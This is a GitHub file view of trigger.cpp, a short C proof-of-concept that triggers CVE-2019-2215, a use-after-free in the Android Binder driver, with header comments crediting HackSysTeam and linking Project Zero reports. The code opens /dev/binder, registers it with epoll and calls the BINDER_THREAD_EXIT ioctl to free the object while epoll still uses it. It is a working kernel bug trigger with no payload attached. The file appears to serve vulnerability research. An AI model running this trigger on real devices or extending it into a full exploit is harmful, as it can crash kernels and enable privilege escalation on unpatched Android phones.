-
Notifications
You must be signed in to change notification settings - Fork 17
/
trigger.cpp
50 lines (37 loc) · 1.33 KB
/
trigger.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/*++
## # # ### ### ### # ### ### ### # ###
# # # # # # # ## # # # # ## #
# # # ## ### ### # # # ### ### ### ### # ###
# # # # # # # # # # # # #
## # ### ### ### ### ### ### ### ### ###
@HackSysTeam
CVE-2019-2215
Android Binder Use after Free
CloudFuzz TechnoLabs Pvt. Ltd.
https://groups.google.com/d/msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ
https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html
Thanks:
@maddiestone
@tehjh
--*/
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <stdio.h>
#define BINDER_THREAD_EXIT 0x40046208ul
int main() {
int fd, epfd;
// An event, triggered when the file discriptor is ready for read
struct epoll_event event = {.events = EPOLLIN};
// open read-only
fd = open("/dev/binder", O_RDONLY);
epfd = epoll_create(1000);
// allocation
// add the fd to event_poll
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
// free
// exit the binder (IPC) (ioctl is used for IPC communication)
ioctl(fd, BINDER_THREAD_EXIT, NULL);
// call : when exiting from the process
}